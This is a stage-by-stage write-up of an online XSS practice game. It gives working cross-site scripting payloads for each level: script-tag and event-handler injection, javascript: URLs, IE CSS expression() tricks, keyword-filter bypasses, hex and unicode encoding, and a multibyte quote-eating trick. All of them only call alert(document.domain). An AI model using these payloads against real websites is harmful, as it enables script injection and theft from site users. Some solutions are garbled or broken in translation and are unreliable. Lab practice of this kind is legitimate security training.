XSS Challenges WriteUp

XSS Challenges WriteUp
0x01: Description

Recently I found a good XSS exercise level ---- XSS Challenges. If you are interested, you can do it ==> portal <=

Here I will share with you the writeup of some levels to learn from each other.

0x02: WriteUpStage #1

This is relatively simple.

<script>alert(document.domain)</script>

Stage #2

The entered content is put into the tag. You can close the tag.

"><script>alert(document.domain)</script><"

It can also be triggered directly in the tag: (click the search input box)

" onclick=alert(document.domain) value="asd

Stage #3

Insert directly in the search box

<script>alert(document.domain)</script>

But it is displayed directly, and the source code is found to be escaped.

"<script>alert(document.domain)</script>"

However, you can try to capture packets and insert statements in the country location.

<script>alert(document.domain)</script>

Pop-up successful

Stage #4

The search and country locations are escaped, but when capturing packets, we noticed that there is another variable behind the country, but it cannot be displayed on the page. You can use firebug to view F12. You can see that the field that follows is set to a hidden attribute. You can modify it to text to display it. You can insert the following statement to the hackme position.

"><script>alert(document.domain)</script><"

Stage #5

The length of the content in the input box is limited. Just modify the attribute.

Closed Tag:

">;<script>alert(document.domain);</script><"

Trigger in the tag: (click the search input box)

" onclick=alert(document.domain) value="asd

Stage #6

Escaped> <triggered by an on event in input.

" onclick=alert(document.domain) value="asd

Stage #7

Escape "" but use

" onclick=alert(document.domain)

Still, the double quotation mark above is only used as the display content. It is also possible to change other characters.

Stage #8

The tag is used to trigger js. The window is displayed when the following link is clicked.

javascript：alert(document.domain)

Stage #9

The test failed. This is very restrictive with the browser. I checked some information and it seems that it can be implemented only in the version of ie8. I used Firefox and IE was up to 9. Here we will tell you how to solve this problem. Even if you do not know the correct solution, you can just insert JavaScript code in the appropriate position on the webpage.

<script>alert(document.domain)</script>

Of course, you still need to do the exercises well...

Stage #10

Similar to the previous situation, but the domain is filtered, which can be constructed in this way.

" onclick=alert(document.domdomainain) value="asd

Stage #11

Here, the tag is filtered. The script = "xscript on event =" onxxxx. In this way, it can be triggered using the tag and html encoding is required for JavaScript, here, we only need to encode s.

">a<"

Stage #12

After testing, the angle brackets, double quotation marks, and spaces are filtered out, and the following code is passed in IE. The two single quotation marks are keys under ESC.

``onclick=alert(document.domain)

Stage #13

This document describes the CSS style attribute XSS. In CSS styles, expression is used to implement onmouseover/onmouseout events in JavaScript.

expression(onmouseover=function(){alert(document.domain)})

It can be used successfully only in IE.

Stage #14

Expression is filtered and the regular expression is displayed as follows.

s/(url|script|eval|expression)/xxx/ig;

You can add a annotator to bypass

expre/**/ssion(onmouseover=function(){alert(document.domain)})

Stage #15

> <Is encoded and is in the document. write () function. You can perform hexadecimal encoding on> <.

\\x3Cscript\\x3Ealert(document.domain)\\x3C/script\\x3E

Stage #16

Change to Unicode encoding

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e

Stage #17

Multi-byte character, similar to php wide byte injection, inputs a special byte and eats double quotation marks

1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7

Stage #18

Test failed...